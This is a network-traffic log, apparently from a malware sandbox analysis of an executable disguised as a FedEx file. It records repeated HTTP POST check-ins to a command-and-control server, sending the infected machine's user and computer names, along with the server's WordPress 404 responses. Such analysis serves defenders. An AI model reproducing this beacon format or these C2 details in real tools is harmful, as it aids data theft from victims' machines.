                May 22, 2024 22:01:42.996242046 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                May 22, 2024 22:01:43.001065969 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                May 22, 2024 22:01:43.005872965 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                May 22, 2024 22:01:43.005886078 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                May 22, 2024 22:01:43.005896091 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                May 22, 2024 22:01:43.015408039 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:01:43.019284964 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:01:43.019305944 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:01:43.019315004 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.74970745.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:01:43.233365059 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 192
                Connection: close
                May 22, 2024 22:01:43.284064054 CEST192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: 'ckav.rufrontdesk841618FRONTDESK-PC+0FDD42EE188E931437F4FBE2CdiCaT
                May 22, 2024 22:01:47.036700964 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:01:43 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:01:47.038836002 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:01:47.043613911 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:01:47.048432112 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                May 22, 2024 22:01:47.048445940 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                May 22, 2024 22:01:47.048456907 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                May 22, 2024 22:01:47.057940006 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:01:47.061786890 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:01:47.061800957 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:01:47.061811924 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.74970845.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:01:47.110311985 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:01:47.176254034 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:01:50.267817974 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:01:47 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:01:50.268203974 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                May 22, 2024 22:01:50.268959045 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                May 22, 2024 22:01:50.269798040 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                May 22, 2024 22:01:50.269813061 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                May 22, 2024 22:01:50.269824028 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                May 22, 2024 22:01:50.271435022 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:01:50.272250891 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:01:50.272264957 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:01:50.273055077 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.74970945.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:01:50.434634924 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:01:50.447763920 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:01:53.568820953 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:01:50 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
